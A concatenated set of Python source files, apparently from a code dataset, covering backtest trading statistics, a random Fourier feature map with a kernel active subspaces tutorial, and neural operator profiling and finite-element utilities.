rmru = ru.max(axis=1)
return pd.Series(data=rmru, index=ser.index, name=ser.name)
#####################################################################
# PERCENT CHANGE - used to compute several stastics
def pct_change(close, period):
diff = (close.shift(-period) - close) / close * 100
diff.dropna(inplace=True)
return diff
#####################################################################
# RATIOS
def sharpe_ratio(rets, risk_free=0.00, period=TRADING_DAYS_PER_YEAR):
"""
summary Returns the daily Sharpe ratio of the returns.
param rets: 1d numpy array or fund list of daily returns (centered on 0)
param risk_free: risk free returns, default is 0%
return Sharpe Ratio, computed off daily returns
"""
dev = np.std(rets, axis=0)
mean = np.mean(rets, axis=0)
sharpe = (mean*period - risk_free) / (dev * np.sqrt(period))
return sharpe
def sortino_ratio(rets, risk_free=0.00, period=TRADING_DAYS_PER_YEAR):
"""
summary Returns the daily Sortino ratio of the returns.
param rets: 1d numpy array or fund list of daily returns (centered on 0)
param risk_free: risk free return, default is 0%
return Sortino Ratio, computed off daily returns
"""
mean = np.mean(rets, axis=0)
negative_rets = rets[rets < 0]
dev = np.std(negative_rets, axis=0)
sortino = (mean*period - risk_free) / (dev * np.sqrt(period))
return sortino
#####################################################################
# STATS - this is the primary call used to generate the results
def stats(ts, tlog, dbal, start, end, capital):
"""
Compute trading stats
Parameters
----------
ts : Dataframe
Time series of security prices (date, high, low, close, volume,
adj_close)
tlog : Dataframe
Trade log (entry_date, entry_price, long_short, qty,
exit_date, exit_price, pl_points, pl_cash, cumul_total)
dbal : Dataframe
Daily Balance (date, high, low, close)
start : datetime
date of first buy
end : datetime
date of last sell
capital : float
starting capital
Examples
--------
Returns
-------
stats : Series of stats
"""
stats = pd.Series()
# OVERALL RESULTS
stats['start'] = start.strftime('%Y-%m-%d')
stats['end'] = end.strftime('%Y-%m-%d')
stats['beginning_balance'] = beginning_balance(capital)
stats['ending_balance'] = ending_balance(dbal)
stats['total_net_profit'] = total_net_profit(tlog)
stats['gross_profit'] = gross_profit(tlog)
stats['gross_loss'] = gross_loss(tlog)
stats['profit_factor'] = profit_factor(tlog)
stats['return_on_initial_capital'] = return_on_initial_capital(tlog, capital)
cagr = annual_return_rate(dbal['close'][-1], capital, start, end)
stats['annual_return_rate'] = cagr
stats['trading_period'] = trading_period(start, end)
stats['pct_time_in_market'] = pct_time_in_market(dbal)
# SUMS
stats['total_num_trades'] = total_num_trades(tlog)
stats['trades_per_year'] = trades_per_year(tlog, start, end)
stats['num_winning_trades'] = num_winning_trades(tlog)
stats['num_losing_trades'] = num_losing_trades(tlog)
stats['num_even_trades'] = num_even_trades(tlog)
stats['pct_profitable_trades'] = pct_profitable_trades(tlog)
# CASH PROFITS AND LOSSES
stats['avg_profit_per_trade'] = avg_profit_per_trade(tlog)
stats['avg_profit_per_winning_trade'] = avg_profit_per_winning_trade(tlog)
stats['avg_loss_per_losing_trade'] = avg_loss_per_losing_trade(tlog)
stats['ratio_avg_profit_win_loss'] = ratio_avg_profit_win_loss(tlog)
stats['largest_profit_winning_trade'] = largest_profit_winning_trade(tlog)
stats['largest_loss_losing_trade'] = largest_loss_losing_trade(tlog)
# POINTS
stats['num_winning_points'] = num_winning_points(tlog)
stats['num_losing_points'] = num_losing_points(tlog)
stats['total_net_points'] = total_net_points(tlog)
stats['avg_points'] = avg_points(tlog)
stats['largest_points_winning_trade'] = largest_points_winning_trade(tlog)
stats['largest_points_losing_trade'] = largest_points_losing_trade(tlog)
stats['avg_pct_gain_per_trade'] = avg_pct_gain_per_trade(tlog)
stats['largest_pct_winning_trade'] = largest_pct_winning_trade(tlog)
stats['largest_pct_losing_trade'] = largest_pct_losing_trade(tlog)
# STREAKS
stats['max_consecutive_winning_trades'] = max_consecutive_winning_trades(tlog)
stats['max_consecutive_losing_trades'] = max_consecutive_losing_trades(tlog)
stats['avg_bars_winning_trades'] = avg_bars_winning_trades(ts, tlog)
stats['avg_bars_losing_trades'] = avg_bars_losing_trades(ts, tlog)
# DRAWDOWN
dd = max_closed_out_drawdown(dbal['close'])
stats['max_closed_out_drawdown'] = dd['max']
stats['max_closed_out_drawdown_start_date'] = dd['start_date']
stats['max_closed_out_drawdown_end_date'] = dd['end_date']
stats['max_closed_out_drawdown_recovery_date'] = dd['recovery_date']
stats['drawdown_recovery'] = _difference_in_years(
datetime.strptime(dd['start_date'], '%Y-%m-%d'),
datetime.strptime(dd['end_date'], '%Y-%m-%d')) *-1
stats['drawdown_annualized_return'] = dd['max'] / cagr
dd = max_intra_day_drawdown(dbal['high'], dbal['low'])
stats['max_intra_day_drawdown'] = dd['max']
dd = rolling_max_dd(dbal['close'], TRADING_DAYS_PER_YEAR)
stats['avg_yearly_closed_out_drawdown'] = np.average(dd)
stats['max_yearly_closed_out_drawdown'] = min(dd)
dd = rolling_max_dd(dbal['close'], TRADING_DAYS_PER_MONTH)
stats['avg_monthly_closed_out_drawdown'] = np.average(dd)
stats['max_monthly_closed_out_drawdown'] = min(dd)
dd = rolling_max_dd(dbal['close'], TRADING_DAYS_PER_WEEK)
stats['avg_weekly_closed_out_drawdown'] = np.average(dd)
stats['max_weekly_closed_out_drawdown'] = min(dd)
# RUNUP
ru = rolling_max_ru(dbal['close'], TRADING_DAYS_PER_YEAR)
stats['avg_yearly_closed_out_runup'] = np.average(ru)
stats['max_yearly_closed_out_runup'] = ru.max()
ru = rolling_max_ru(dbal['close'], TRADING_DAYS_PER_MONTH)
stats['avg_monthly_closed_out_runup'] = np.average(ru)
stats['max_monthly_closed_out_runup'] = max(ru)
ru = rolling_max_ru(dbal['close'], TRADING_DAYS_PER_WEEK)
stats['avg_weekly_closed_out_runup'] = np.average(ru)
stats['max_weekly_closed_out_runup'] = max(ru)
# PERCENT CHANGE
pc = pct_change(dbal['close'], TRADING_DAYS_PER_YEAR)
stats['pct_profitable_years'] = (pc > 0).sum() / len(pc) * 100
stats['best_year'] = pc.max()
stats['worst_year'] = pc.min()
stats['avg_year'] = np.average(pc)
stats['annual_std'] = pc.std()
pc = pct_change(dbal['close'], TRADING_DAYS_PER_MONTH)
stats['pct_profitable_months'] = (pc > 0).sum() / len(pc) * 100
stats['best_month'] = pc.max()
stats['worst_month'] = pc.min()
stats['avg_month'] = np.average(pc)
stats['monthly_std'] = pc.std()
pc = pct_change(dbal['close'], TRADING_DAYS_PER_WEEK)
stats['pct_profitable_weeks'] = (pc > 0).sum() / len(pc) * 100
stats['best_week'] = pc.max()
stats['worst_week'] = pc.min()
stats['avg_week'] = np.average(pc)
stats['weekly_std'] = pc.std()
# RATIOS
stats['sharpe_ratio'] = sharpe_ratio(dbal['close'].pct_change())
stats['sortino_ratio'] = sortino_ratio(dbal['close'].pct_change())
return stats
#####################################################################
# SUMMARY - stats() must be called before calling any of these functions
def summary(stats, *metrics):
"""
Returns stats summary in a DataFrame.
stats() must be called before calling this function
"""
index = []
columns = ['strategy']
data = []
# add metrics
for metric in metrics:
index.append(metric)
data.append(stats[metric])
df = pd.DataFrame(data, columns=columns, index=index)
return df
def summary2(stats, benchmark_stats, *metrics):
"""
Returns stats with benchmark summary in a DataFrame.
stats() must be called before calling this function
"""
index = []
columns = ['strategy', 'benchmark']
data = []
# add metrics
for metric in metrics:
index.append(metric)
data.append((stats[metric], benchmark_stats[metric]))
df = pd.DataFrame(data, columns=columns, index=index)
return df
def summary3(stats, benchmark_stats, *extras):
"""
Returns stats with benchmark summary in a DataFrame.
stats() must be called before calling this function
*extras: extra metrics
"""
index = ['annual_return_rate',
'max_closed_out_drawdown',
'drawdown_annualized_return',
'pct_profitable_months',
'best_month',
'worst_month',
'sharpe_ratio',
'sortino_ratio']
columns = ['strategy', 'benchmark']
data = [(stats['annual_return_rate'],
benchmark_stats['annual_return_rate']),
(stats['max_closed_out_drawdown'],
benchmark_stats['max_closed_out_drawdown']),
(stats['drawdown_annualized_return'],
benchmark_stats['drawdown_annualized_return']),
(stats['pct_profitable_months'],
benchmark_stats['pct_profitable_months']),
(stats['best_month'],
benchmark_stats['best_month']),
(stats['worst_month'],
benchmark_stats['worst_month']),
(stats['sharpe_ratio'],
benchmark_stats['sharpe_ratio']),
(stats['sortino_ratio'],
benchmark_stats['sortino_ratio'])]
# add extra metrics
for extra in extras:
index.append(extra)
data.append((stats[extra], benchmark_stats[extra]))
df = pd.DataFrame(data, columns=columns, index=index)
return df
def summary4(stats):
"""
Returns currency stats summary in a DataFrame.
stats() must be called before calling this function
"""
index = ['beginning_balance',
'ending_balance',
'total_net_profit',
'gross_profit',
'gross_loss']
columns = ['strategy']
data = [currency(stats['beginning_balance']),
currency(stats['ending_balance']),
currency(stats['total_net_profit']),
currency(stats['gross_profit']),
currency(stats['gross_loss'])]
df = pd.DataFrame(data, columns=columns, index=index)
return df
def summary5(stats, benchmark_stats):
"""
Returns currency stats with benchmark summary in a DataFrame.
stats() must be called before calling this function
"""
index = ['beginning_balance',
'ending_balance',
'total_net_profit',
'gross_profit',
'gross_loss']
columns = ['strategy', 'benchmark']
data = [(currency(stats['beginning_balance']),
currency(benchmark_stats['beginning_balance'])),
(currency(stats['ending_balance']),
currency(benchmark_stats['ending_balance'])),
(currency(stats['total_net_profit']),
currency(benchmark_stats['total_net_profit'])),
(currency(stats['gross_profit']),
currency(benchmark_stats['gross_profit'])),
(currency(stats['gross_loss']),
currency(benchmark_stats['gross_loss']))]
df = pd.DataFrame(data, columns=columns, index=index)
return df
``` |
{
"source": "Jimmy-INL/ATHENA",
"score": 3
} |
#### File: ATHENA/athena/feature_map.py
```python
from functools import partial
import numpy as np
from scipy.optimize import brute, dual_annealing
import GPyOpt
from .projection_factory import ProjectionFactory
class FeatureMap():
"""Feature map class.
:param str distr: name of the spectral distribution to sample from the
matrix.
:param numpy.ndarray bias: n_features dimensional bias. It is sampled from a
Unifrom distribution on the interval [0, 2*PI].
:param int input_dim: dimension of the input space.
:param int n_features: dimension of the Reproducing Kernel Hilbert Space.
:param list params: number of hyperparameters of the spectral distribution.
:param int sigma_f: multiplicative constant of the feature
map. Usually it is set as the empirical variance of the outputs.
:cvar callable fmap: feature map used to project the input samples to the RKHS.
Default value is rff_map.
:cvar callable fjac: Jacobian matrix of fmap. Default value is rff_jac, the
analytical Jacobian of fmap.
:cvar numpy.ndarray _pr_matrix: n_features-by-input_dim projection
matrix, whose rows are sampled from the spectral distribution distr.
:raises TypeError
"""
def __init__(self, distr, bias, input_dim, n_features, params, sigma_f):
if callable(distr):
self.distr = distr
elif isinstance(distr, str):
self.distr = ProjectionFactory(distr)
else:
raise TypeError('`distr` is not valid.')
self.bias = bias
self.input_dim = input_dim
self.n_features = n_features
self.params = params
self.sigma_f = sigma_f
self.fmap = rff_map
self.fmap_jac = rff_jac
self._pr_matrix = None
@property
def pr_matrix(self):
"""
Get the projection matrix.
:return: the projection matrix.
:rtype: numpy.ndarray
"""
return self._pr_matrix
def _compute_pr_matrix(self):
"""
Sample the projection matrixx from the spectral distribution.
:return: the projection matrix.
:rtype: numpy.ndarray
"""
return self.distr(self.input_dim, self.n_features, self.params)
def compute_fmap(self, inputs):
"""
Evaluate the feature map at inputs.
:param numpy.ndarray inputs: the inputs to project on the RKHS.
:return: the n_features dimensional projection of the inputs.
:rtype: numpy.ndarray
"""
if self._pr_matrix is None:
self._pr_matrix = self._compute_pr_matrix()
return self.fmap(inputs, self._pr_matrix, self.bias, self.n_features,
self.sigma_f)
def compute_fmap_jac(self, inputs):
"""
Evaluate the Jacobian matrix of feature map at inputs.
:param numpy.ndarray inputs: the inputs at which compute the Jacobian
matrix of the feature map.
:return: the n_features-by-input_dim dimensional Jacobian of the
feature map at the inputs.
:rtype: numpy.ndarray
"""
if self._pr_matrix is None:
self._pr_matrix = self._compute_pr_matrix()
return self.fmap_jac(inputs, self._pr_matrix, self.bias,
self.n_features, self.sigma_f)
def tune_pr_matrix(self,
func,
bounds,
args=(),
method=None,
maxiter=50,
save_file=False):
"""
Tune the parameters of the spectral distribution. Three methods are
available: log-grid-search (brute), annealing (dual_annealing) and
Bayesian stochastic optimization (bso) from GpyOpt. The default object
function to optimize is athena.utils.average_rrmse, which uses a
cross-validation procedure from athena.utils, see Example and tutorial 06_kernel-based_AS.
:Example:
>>> from athena.kas import KernelActiveSubspaces
>>> from athena.feature_map import FeatureMap
>>> from athena.projection_factory import ProjectionFactory
>>> from athena.utils import CrossValidation, average_rrmse
>>> input_dim, output_dim, n_samples = 2, 1, 30
>>> n_features, n_params = 10, 1
>>> xx = np.ones((n_samples, input_dim))
>>> f = np.ones((n_samples, output_dim))
>>> df = np.ones((n_samples, output_dim, input_dim))
>>> fm = FeatureMap(distr='laplace',
bias=np.random.uniform(0, 2 * np.pi, n_features),
input_dim=input_dim,
n_features=n_features,
params=np.zeros(n_params),
sigma_f=f.var())
>>> kss = KernelActiveSubspaces(feature_map=fm, dim=1, n_features=n_features)
>>> csv = CrossValidation(inputs=xx,
outputs=f.reshape(-1, 1),
gradients=df.reshape(n_samples, output_dim, input_dim),
folds=3,
subspace=kss)
>>> best = fm.tune_pr_matrix(func=average_rrmse,
bounds=[slice(-2, 1, 0.2) for i in range(n_params)],
args=(csv, ),
method='bso',
maxiter=20,
save_file=False)
:param callable func: the objective function to be minimized.
Must be in the form f(x, *args), where x is the argument in the
form of a 1-D array and args is a tuple of any additional fixed
parameters needed to completely specify the function.
:param tuple bounds: each component of the bounds tuple must be a
slice tuple of the form (low, high, step). It defines bounds for
the objective function parameter in a logarithmic scale. Step will
be ignored for 'dual_annealing' method.
:param tuple args: any additional fixed parameters needed to
completely specify the objective function.
:param str method: method used to optimize the objective function.
Possible values are 'brute', or 'dual_annealing'.
Default value is None, and the choice is made automatically wrt
the dimension of `self.params`. If the dimension is less than 4
brute force is used, otherwise a traditional Generalized
Simulated Annealing will be performed with no local search
strategy applied.
:param int maxiter: the maximum number of global search iterations.
Default value is 50.
:param bool save_file: True to save the optimal projection matrix
:raises: ValueError
:return: list that records the best score and the best projection
matrix. The initial values are 0.8 and a n_features-by-input_dim
numpy.ndarray of zeros.
:rtype: list
"""
best = [0.8, np.zeros((self.n_features, self.input_dim))]
if method is None:
if len(self.params) < 4:
method = 'brute'
else:
method = 'dual_annealing'
if method == 'brute':
self.params = brute(func=func,
ranges=bounds,
args=(
*args,
best,
),
finish=None)
elif method == 'dual_annealing':
bounds_list = [[bound.start, bound.stop] for bound in bounds]
self.params = 10**dual_annealing(func=func,
bounds=bounds_list,
args=(
*args,
best,
),
maxiter=maxiter,
no_local_search=False).x
elif method == 'bso':
bounds = [{
'name': 'var_' + str(i),
'type': 'continuous',
'domain': [bound.start, bound.stop]
} for i, bound in enumerate(bounds)]
func_obj = partial(func, csv=args[0], best=best)
bopt = GPyOpt.methods.BayesianOptimization(func_obj,
domain=bounds,
model_type='GP',
acquisition_type='EI',
exact_feval=True)
bopt.run_optimization(max_iter=maxiter,
max_time=3600,
eps=1e-16,
verbosity=False)
self.params = 10**bopt.x_opt
else:
raise ValueError(
"Method argument can only be 'brute' or 'dual_annealing' or 'bso'."
)
self._pr_matrix = best[1]
self.params = best[0]
if save_file:
np.save("opt_pr_matrix", best[1])
return best
def rff_map(inputs, pr_matrix, bias, n_features, sigma_f):
"""
Random Fourier Features map. It can be vectorized for inputs of shape n_samples-by-input_dim.
:param numpy.ndarray inputs: input_dim dimensional inputs to project to the RKHS.
:param numpy.ndarray pr_matrix: n_features-by-input_dim projection matrix,
whose rows are sampled from the spectral distribution.
:param numpy.ndarray bias: n_features dimensional bias. It is sampled from a
Unifrom distribution on the interval [0, 2*PI].
:param int n_features: dimension of the RKHS
:param int sigma_f: multiplicative term representing the empirical variance
the outptus.
:return: n_features dimensional projection of the inputs to the RKHS
:rtype: numpy.ndarray
"""
return np.sqrt(2 / n_features) * sigma_f * np.cos(
np.dot(inputs, pr_matrix.T) + bias.reshape(1, -1))
def rff_jac(inputs, pr_matrix, bias, n_features, sigma_f):
"""
Random Fourier Features map's Jacobian. It can be vectorized for inputs of shape n_samples-by-input_dim.
:param numpy.ndarray inputs: input_dim dimensional inputs to project to the RKHS.
:param numpy.ndarray pr_matrix: n_features-by-input_dim projection matrix,
whose rows are sampled from the spectral distribution.
:param numpy.ndarray bias: n_features dimensional bias. It is sampled from a
Unifrom distribution on the interval [0, 2*PI].
:param int n_features: dimension of the RKHS
:param int sigma_f: multiplicative term representing the empirical variance
the outptus.
:return: n_features-by-input_dim dimensional projection of the inputs to the RKHS
:rtype: numpy.ndarray
"""
return (np.sqrt(2 / n_features) * sigma_f *
(-1) * np.sin(np.dot(inputs, pr_matrix.T) + bias)).reshape(
inputs.shape[0], n_features, 1) * pr_matrix
```
#### File: tutorials/tutorial06/06_kernel-based_AS.py
```python
import autograd.numpy as np
from autograd import elementwise_grad as egrad
import matplotlib.pyplot as plt
from functools import partial
import GPy
from athena.active import ActiveSubspaces
from athena.kas import KernelActiveSubspaces
from athena.feature_map import FeatureMap, rff_map, rff_jac
from athena.projection_factory import ProjectionFactory
from athena.utils import Normalizer, CrossValidation, average_rrmse
from data.numpy_functions import radial
np.random.seed(42)
# global parameters
n_samples = 800 # this is the number of data points to use for the tuning of kas
N = 500 # this is the number of test samples to use
input_dim = 2
# set the dimension of the discrete feature space (D in the introduction)
n_features = 1000
def sample_in_out(input_dim, n_samples):
#input ranges
lb = np.array(-3 * np.ones(input_dim))
ub = np.array(3 * np.ones(input_dim))
#input normalization
XX = np.random.uniform(lb, ub, (n_samples, input_dim))
nor = Normalizer(lb, ub)
x = nor.fit_transform(XX)
#output values (f) and gradients (df)
func = partial(radial, normalizer=nor, generatrix=lambda x: np.cos(x))
f = func(x)
df = egrad(func)(x)
return x, f, df
xx, f, df = sample_in_out(input_dim, n_samples)
y, t, dt = sample_in_out(input_dim, N)
#AS
ss = ActiveSubspaces(1)
ss.fit(gradients=dt, outputs=t, inputs=y)
ss.plot_eigenvalues()
ss.plot_sufficient_summary(y, t)
# number of parameters of the spectral distribution associated to the feature map
# this is the number of parameters to tune after
n_params = 1
# sample the bias term
b = np.random.uniform(0, 2 * np.pi, n_features)
# define the feature map
fm = FeatureMap(distr='laplace',
bias=b,
input_dim=input_dim,
n_features=n_features,
params=np.zeros(n_params),
sigma_f=f.var())
# instantiate a KernelActiveSubspaces object with associated feature map
kss = KernelActiveSubspaces(feature_map=fm, dim=1, n_features=n_features)
# number of folds for the cross-validation algorithm
folds = 3
# Skip if bias and projection matrix are loaded
csv = CrossValidation(inputs=xx,
outputs=f.reshape(-1, 1),
gradients=df.reshape(n_samples, 1, input_dim),
folds=folds,
subspace=kss)
best = fm.tune_pr_matrix(func=average_rrmse,
bounds=[slice(-2, 1, 0.2) for i in range(n_params)],
args=(csv, ),
method='bso',
maxiter=20,
save_file=False)
print('The lowest rrmse is {}%'.format(best[0]))
W = np.load('opt_pr_matrix.npy')
b = np.load('bias.npy')
fm._pr_matrix = W
fm.bias = b
kss.fit(gradients=dt.reshape(N, 1, input_dim),
outputs=t,
inputs=y)
kss.plot_eigenvalues(n_evals=5)
kss.plot_sufficient_summary(xx, f)
``` |
{
"source": "Jimmy-INL/fourier-transformer",
"score": 2
} |
#### File: fourier-transformer/examples/ex2_memory_profile.py
```python
import sys
sys.path.append("../")
from libs import *
import argparse
import torch.autograd.profiler as profiler
DEBUG = False
def main():
parser = argparse.ArgumentParser(
description='Memory profiling of various transformers for Example 2')
parser.add_argument('--attention-type', nargs='+', metavar='attn_type',
help='input the attention type for encoders to profile (possile: fourier (alias integral, local), galerkin (alias global), softmax (official PyTorch implementation), linear (standard Q(K^TV) with softmax))',
required=True)
parser.add_argument('--batch-size', type=int, default=4, metavar='N',
help='input batch size for profiling (default: 4)')
parser.add_argument('--subsample-nodes', type=int, default=3, metavar='subsample',
help='input fine grid sampling from 421x421 (default: 3 i.e., 141x141 grid)')
parser.add_argument('--subsample-attn', type=int, default=10, metavar='subsample_attn',
help='input coarse grid sampling from 421x421 (default: 10 i.e., 43x43 grid)')
parser.add_argument('--dmodel', type=int, default=64, metavar='E',
help='input d_model of attention for profiling (default: 64)')
parser.add_argument('--num-iter', type=int, default=1, metavar='k',
help='input number of iteration of backpropagations for profiling (default: 1)')
parser.add_argument('--layer-norm', action='store_true', default=False,
help='use the conventional layer normalization')
parser.add_argument('--no-memory', action='store_true', default=False,
help='disables memory profiling')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA in profiling')
args = parser.parse_args()
cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
n_grid = int(((421 - 1)/args.subsample_nodes) + 1)
n_grid_c = int(((421 - 1)/args.subsample_attn) + 1)
downsample, upsample = DarcyDataset.get_scaler_sizes(n_grid, n_grid_c)
downsample = [round(x, 2) for x in downsample]
current_path = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(current_path, r'config.yml')) as f:
config = yaml.full_load(f)
config = config['ex2_darcy']
for arg in vars(args):
if arg in config.keys():
config[arg] = getattr(args, arg)
config['downscaler_size'] = downsample
config['upscaler_size'] = upsample
attn_types = args.attention_type
for attn_type in attn_types:
config['attention_type'] = attn_type
torch.cuda.empty_cache()
model = FourierTransformer2D(**config)
model = model.to(device)
print(
f"\nModel name: {model.__name__}\t Number of params: {get_num_params(model)}\n")
node = torch.randn(args.batch_size, n_grid, n_grid, 1).to(device)
pos = torch.randn(args.batch_size, n_grid_c**2, 2).to(device)
target = torch.randn(args.batch_size, n_grid, n_grid, 1).to(device)
grid = torch.randn(args.batch_size, n_grid, n_grid, 2).to(device)
with profiler.profile(profile_memory=not args.no_memory,
use_cuda=cuda,) as pf:
with tqdm(total=args.num_iter, disable=(args.num_iter<10)) as pbar:
for _ in range(args.num_iter):
y = model(node, None, pos, grid)
y = y['preds']
loss = ((y-target)**2).mean()
loss.backward()
pbar.update()
sort_by = "self_cuda_memory_usage" if cuda else "self_cpu_memory_usage"
file_name = os.path.join(SRC_ROOT, f'ex2_{attn_type}.txt')
with open(file_name, 'w') as f:
print(pf.key_averages().table(sort_by=sort_by,
row_limit=300,
header=str(model.__name__) +
' profiling results',
), file=f)
pf_result = ProfileResult(file_name, num_iters=args.num_iter, cuda=cuda)
if cuda:
pf_result.print_total_mem(['Self CUDA Mem'])
pf_result.print_total_time()
if __name__ == '__main__':
main()
```
#### File: fourier-transformer/libs/utils_ft.py
```python
import argparse
import math
import os
import sys
from collections import OrderedDict
from datetime import date
import numpy as np
import pandas as pd
import torch
from matplotlib import rc, rcParams, tri
from numpy.core.numeric import identity
from scipy.io import loadmat
from scipy.sparse import csr_matrix, diags
from scipy.sparse import hstack as sparse_hstack
from torch import nn
from torch.optim.lr_scheduler import OneCycleLR, _LRScheduler
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
try:
from libs.utils import *
except:
from utils import *
try:
import plotly.express as px
import plotly.figure_factory as ff
import plotly.graph_objects as go
import plotly.io as pio
except ImportError as e:
print('Please install Plotly for showing mesh and solutions.')
current_path = os.path.dirname(os.path.abspath(__file__))
SRC_ROOT = os.path.dirname(current_path)
MODEL_PATH = default(os.environ.get('MODEL_PATH'),
os.path.join(SRC_ROOT, 'models'))
DATA_PATH = default(os.environ.get('DATA_PATH'),
os.path.join(SRC_ROOT, 'data'))
FIG_PATH = default(os.environ.get('FIG_PATH'),
os.path.join(os.path.dirname(SRC_ROOT), 'figures'))
EPOCH_SCHEDULERS = ['ReduceLROnPlateau', 'StepLR', 'MultiplicativeLR',
'MultiStepLR', 'ExponentialLR', 'LambdaLR']
PI = math.pi
SEED = default(os.environ.get('SEED'), 1127802)
def clones(module, N):
'''
Input:
- module: nn.Module obj
Output:
- zip identical N layers (not stacking)
Refs:
- https://nlp.seas.harvard.edu/2018/04/03/attention.html
'''
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
def csr_to_sparse(M):
'''
Input:
M: csr_matrix
Output:
torch sparse tensor
Another implementation can be found in
https://github.com/tkipf/pygcn/blob/master/pygcn/utils.py
def sparse_mx_to_torch_sparse_tensor(sparse_mx):
"""Convert a scipy sparse matrix to a torch sparse tensor."""
sparse_mx = sparse_mx.tocoo().astype(np.float32)
indices = torch.from_numpy(
np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))
values = torch.from_numpy(sparse_mx.data)
shape = torch.Size(sparse_mx.shape)
return torch.sparse.FloatTensor(indices, values, shape)
'''
n, m = M.shape
coo_ = M.tocoo()
ix = torch.LongTensor([coo_.row, coo_.col])
M_t = torch.sparse.FloatTensor(ix,
torch.from_numpy(M.data).float(),
[n, m])
return M_t
def pooling_2d(mat, kernel_size: tuple = (2, 2), method='mean', padding=False):
'''Non-overlapping pooling on 2D data (or 2D data stacked as 3D array).
mat: ndarray, input array to pool. (m, n) or (bsz, m, n)
kernel_size: tuple of 2, kernel size in (ky, kx).
method: str, 'max for max-pooling,
'mean' for mean-pooling.
pad: bool, pad <mat> or not. If no pad, output has size
n//f, n being <mat> size, f being kernel size.
if pad, output has size ceil(n/f), padding is nan
so when computing mean the 0 is counted
Return <result>: pooled matrix.
Modified from https://stackoverflow.com/a/49317610/622119
to handle the case of batch edge matrices
CC BY-SA 3.0
'''
m, n = mat.shape[-2:]
ky, kx = kernel_size
def _ceil(x, y): return int(np.ceil(x/float(y)))
if padding:
ny = _ceil(m, ky)
nx = _ceil(n, kx)
size = mat.shape[:-2] + (ny*ky, nx*kx)
sy = (ny*ky - m)//2
sx = (nx*kx - n)//2
_sy = ny*ky - m - sy
_sx = nx*kx - n - sx
mat_pad = np.full(size, np.nan)
mat_pad[..., sy:-_sy, sx:-_sx] = mat
else:
ny = m//ky
nx = n//kx
mat_pad = mat[..., :ny*ky, :nx*kx]
new_shape = mat.shape[:-2] + (ny, ky, nx, kx)
if method == 'max':
result = np.nanmax(mat_pad.reshape(new_shape), axis=(-3, -1))
elif method == 'mean':
result = np.nanmean(mat_pad.reshape(new_shape), axis=(-3, -1))
else:
raise NotImplementedError("pooling method not implemented.")
return result
def quadpts(order=2):
'''
ported from <NAME>'s iFEM's quadpts
'''
if order == 1: # Order 1, nQuad 1
baryCoords = [1/3, 1/3, 1/3]
weight = 1
elif order == 2: # Order 2, nQuad 3
baryCoords = [[2/3, 1/6, 1/6],
[1/6, 2/3, 1/6],
[1/6, 1/6, 2/3]]
weight = [1/3, 1/3, 1/3]
elif order == 3: # Order 3, nQuad 4
baryCoords = [[1/3, 1/3, 1/3],
[0.6, 0.2, 0.2],
[0.2, 0.6, 0.2],
[0.2, 0.2, 0.6]]
weight = [-27/48, 25/48, 25/48, 25/48]
elif order == 4: # Order 4, nQuad 6
baryCoords = [[0.108103018168070, 0.445948490915965, 0.445948490915965],
[0.445948490915965, 0.108103018168070, 0.445948490915965],
[0.445948490915965, 0.445948490915965, 0.108103018168070],
[0.816847572980459, 0.091576213509771, 0.091576213509771],
[0.091576213509771, 0.816847572980459, 0.091576213509771],
[0.091576213509771, 0.091576213509771, 0.816847572980459], ]
weight = [0.223381589678011, 0.223381589678011, 0.223381589678011,
0.109951743655322, 0.109951743655322, 0.109951743655322]
return np.array(baryCoords), np.array(weight)
def get_distance_matrix(node, graph=False):
'''
Input:
- Node: nodal coords
- graph: bool, whether to return graph distance
Output:
- inverse distance matrices (linear and square)
(batch_size, N, N, 2)
'''
N = len(node)
idx = np.arange(N)
Ds = []
for i in range(len(idx)):
if graph:
d = np.abs(idx[i] - idx)
else:
d = np.abs(node[i] - node)
Ds.append(d)
Dss = []
if graph:
Ds = np.array(Ds) + 1
Ds = 1 / Ds
Ds = np.repeat(Ds, 1, axis=0)
for i in [1, 2]:
Dss.append(Ds ** i)
else:
Ds = np.array(Ds)
max_distance = Ds.max()
Ds /= (max_distance + 1e-8)
Dss.append(np.exp(-Ds))
Ds = 1 / (1+Ds)
Dss.append(Ds)
Ds = np.stack(Dss, axis=2)
return Ds
def get_laplacian_1d(node,
K=None,
weight=None, # weight for renormalization
normalize=True,
smoother=None):
'''
Construct the 1D Laplacian matrix on the domain defined by node.
with a variable mesh size.
Input:
- node: array-like, shape (N, ) One dimensional mesh; or a positve integer.
- normalize: apply D^{-1/2} A D^{-1/2} row and column scaling to the Laplacian
Output:
- A : scipy sparse matrix, shape (N, N)
Laplacian matrix.
Reference:
Code adapted to 1D from the 2D one in
<NAME>: iFEM: An innovative finite element method package in Matlab.
Technical report, University of California-Irvine, 2009
'''
if isinstance(node, int):
node = np.linspace(0, 1, node)
N = node.shape[0]
h = node[1:] - node[:-1]
elem = np.c_[np.arange(N-1), np.arange(1, N)]
Dphi = np.c_[-1/h, 1/h]
if K is None:
K = 1
# stiffness matrix
A = csr_matrix((N, N))
for i in range(2):
for j in range(2):
# $A_{ij}|_{\tau} = \int_{\tau}K\nabla \phi_i\cdot \nabla \phi_j dxdy$
Aij = h*K*Dphi[:, i]*Dphi[:, j]
A += csr_matrix((Aij, (elem[:, i], elem[:, j])), shape=(N, N))
if weight is not None:
A += diags(weight)
if normalize:
D = diags(A.diagonal()**(-0.5))
A = (D.dot(A)).dot(D)
if smoother == 'jacobi':
I = identity(N)
A = I-(2/3)*A # jacobi
A = csr_matrix(A)
elif smoother == 'gs':
raise NotImplementedError("Gauss-seidel not implemented")
return A
def get_mass_1d(node, K=None, normalize=False):
'''
Construct the 1D Mass matrix on the domain defined by node.
with a variable mesh size.
Input:
- node: array-like, shape (N, ) One dimensional mesh.
- normalize: apply D^{-1/2} M D^{-1/2} row and column scaling to the mass matrix
Output:
- M : scipy sparse matrix, shape (N, N), mass matrix.
Reference:
Code adapted to 1D from the 2D one in
<NAME>: iFEM: An innovative finite element method package in Matlab.
Technical report, University of California-Irvine, 2009
'''
if isinstance(node, int):
node = np.linspace(0, 1, node)
N = node.shape[0]
h = node[1:] - node[:-1]
elem = np.c_[np.arange(N-1), np.arange(1, N)]
if K is None:
K = 1
# mass matrix
M = csr_matrix((N, N))
for i in range(2):
for j in range(2):
